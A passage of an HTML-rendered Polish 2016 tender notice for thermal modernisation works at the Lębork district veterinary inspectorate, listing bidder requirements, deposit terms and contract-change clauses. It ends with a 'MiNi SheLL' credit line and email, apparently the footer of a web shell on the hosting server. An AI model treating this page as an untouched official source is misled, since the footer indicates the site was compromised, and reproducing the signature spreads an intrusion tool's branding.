- rynny śr. 150 mm z blachy stalowej powlekanej - 22,80 m
- montaż rur spustowych (z demontażu) z uwzględnieniem grubości docieplenia - 9,90 m
- dostawa i osadzenie okna w profilach PCV- uchylno-rozwierne z rozszczelnieniem, o U=1,1 W/m2K 0,90x1,20 m - 1,08 m2
- dostawa i montaż bramy garażowej uchylnej (na wzór istniejących w budynku) - wraz z powiększeniem otworu - 5,46 m2
- wykonanie opaski z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej z zamknięciem obrzeżem betonowym 30x8 cm - 10,58 m2
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45111000-8,
                45262520-2,
                45410000-4,
                45430000-0,
                45320000-6,
                45442100-8,
                45421000-4,
                45421160-3,
                45320000-6,
                45310000-3,
                45233200-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 3<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek dotyczący sytuacji finansowej i ekonomicznej jeżeli przedstawi informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, na kwotę minimum 100.000 zł;<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej jeżeli wykaże, że wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy roboty budowlane  polegające na wykonaniu termomodernizacji o wartości nie mniejszej niż 100 000 PLN wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
oraz dysponuje osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">* odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp;
* zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
*zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />* Wykaz robót  Załącznik nr 4 do SIWZ;(dotyczy prac budowlanych, jakie wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy roboty budowlane  polegające na wykonaniu termomodernizacji o wartości nie mniejszej niż 100 000 PLN);
* Wykaz osób  Załącznik nr 5 do SIWZ; (potwierdzenie, że Wykonawca dysponuje osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń);
* Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, na kwotę minimum 100 000 PLN;<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">kosztorys ofertowy</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium w wysokości  4 000 zł (słownie: cztery tysiące  00/100 złotych).
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu,
a)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
b)	gwarancjach bankowych,
c)	gwarancjach ubezpieczeniowych,
b)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 poz. 978 i 1240)
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Powiatowego Inspektoratu Weterynarii, ul. Weterynaryjna 1, 84-300 Lębork, w banku NBP O/O Gdańsk  Nr konta: 82 1010 1140 0196 3713 9120 0000
  przed terminem otwarcia ofert, z podaniem tytułu
Wadium - przetarg nieograniczony PIW 08.225.01.2016".
  Datą wniesienia wadium jest data uznania rachunku zamawiającego.
4. Wadium wnoszone w formie niepieniężnej powinno być wystawione na Powiatowy
Inspektorat Weterynarii, ul. Weterynaryjna 1, 84-300 Lębork. Oryginał dokumentu należy
złożyć w opisanej kopercie wraz z ofertą, natomiast potwierdzoną za zgodność
z oryginałem kserokopię dołączyć do oferty.
UWAGA: Zamawiający zaleca, aby oryginał dokumentu gwarancji/poręczenia nie był w sposób trwały spięty z ofertą.
5. Dokument poręczenia/gwarancyjny powinien przewidywać bezwarunkową utratę wadium na rzecz zamawiającego w przypadkach określonych w ust. 6 i 7.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie Wykonawcy.
7. Ponadto Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3  i 3a ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>GWARANCJA</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:
1)	wystąpienie zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
2)	wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
3)	wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) przy pomocy, których Wykonawca realizuje przedmiot umowy. Zmiana jest możliwa pod warunkiem zaproponowania innych osób spełniających na dzień składania ofert warunki określone w SIWZ,
4)	zmiany podwykonawcy, który zgodnie będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku Wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego, na dzień składania ofert, warunki określone przez Zamawiającego w SIWZ wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w rozdz. 9 SIWZ,
5)	wystąpienia konieczności zmiany osób (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Zamawiającego), przy pomocy których Zamawiający realizuje przedmiot umowy,
6)	wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w SIWZ, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego,
7)	wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego),
b)	zmiany danych teleadresowych,
c)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy,
8)	wystąpią niekorzystne warunki atmosferyczne, uniemożliwiające terminowe wykonanie prac budowlanych,
9)	wystąpią zdarzenia siły wyższej jako zdarzenia zewnętrzne, nieobjęte zamówieniem, którym nie można było zapobiec czy też które były niemożliwe do przewidzenia na etapie projektowania oraz przygotowywania przedmiotu zamówienia a stały się niezbędne w celu prawidłowej realizacji przedmiotu zamówienia.
2.	W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt. 1 do 9 termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
3.	Wszelkie zmiany do niniejszej umowy wymagają pisemnego aneksu podpisanego przez strony, pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 11/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com